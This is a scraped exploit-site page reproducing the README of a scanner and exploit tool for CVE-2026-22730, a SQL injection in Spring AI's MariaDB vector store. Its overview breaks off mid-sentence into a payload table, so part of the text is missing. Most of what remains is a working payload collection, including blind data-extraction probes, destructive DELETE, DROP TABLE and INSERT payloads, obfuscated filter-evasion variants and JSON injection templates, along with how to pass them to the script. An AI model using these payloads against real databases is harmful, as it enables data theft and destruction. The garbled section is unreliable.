Share
## https://sploitus.com/exploit?id=917D955E-0051-5045-96F6-8FE35F3C8D66
CVE-2026-22730 Scanner & Exploit – Spring AI MariaDB Vector Store SQL Injection

https://img.shields.io/badge/python-3.6%252B-blue 

https://img.shields.io/badge/license-MIT-green 

https://img.shields.io/badge/status-stable-brightgreen

A professional security assessment tool for CVE-2026-22730 – a critical SQL injection vulnerability discovered in Spring AI's MariaDB vector store. This tool allows authorised penetration testers and security researchers to detect and safely exploit the vulnerability for educational or defensive purposes.

📖 Overview

CVE-2026-22730 affects Spring AI versions 1.0.x  64 --	Checks first character of database name.

' AND (SELECT COUNT(*) FROM information_schema.tables) > 10 --	Checks number of tables.

' OR (SELECT 1 FROM users LIMIT 1) = 1 --	Tests existence of a table.

6. Write / Delete Operations
   
Destructive payloads (use with extreme caution).

Payload	Description

' OR '1'='1	When used with DELETE, removes all rows.

' OR 1=1; DROP TABLE vector_store --	Attempts to drop the entire table (requires stacked queries, often disabled).

' OR 1=1; INSERT INTO vector_store (content) VALUES ('hacked') --	Attempts to insert new data.

7. Bypass Filters / WAF
   
Obfuscated versions to evade simple pattern matching.

Payload	Description

%27%20OR%20SLEEP(5)%20--	URL‑encoded (script handles this automatically).

' /**/OR/**/SLEEP(5)/**/--	Inline comments to break up keywords.

' OR 0x273d27=0x273d27 --	Hex‑encoded comparison ('=').

' OR 1=1 /*!50000SLEEP(5)*/ --	MySQL version‑specific comment.

8. Specific Payloads from the CVE Advisory
   
Payload	Description

' OR '1'='1	Used to retrieve all documents (proof of concept).

' OR SLEEP(5) --	Time‑based detection payload used in the scanner.

' OR '1'='1	Also used for the DELETE injection.

📝 Example JSON Templates with Payload

json

{"department": "' OR SLEEP(5) --"}

{"department": "' OR '1'='1"}

{"department": "' UNION SELECT 1, content, metadata FROM vector_store --"}

In the script, you would pass the template as:

bash

--json-template '{"department": "__PAYLOAD__"}'

**The script will replace __PAYLOAD__ with the actual payload.**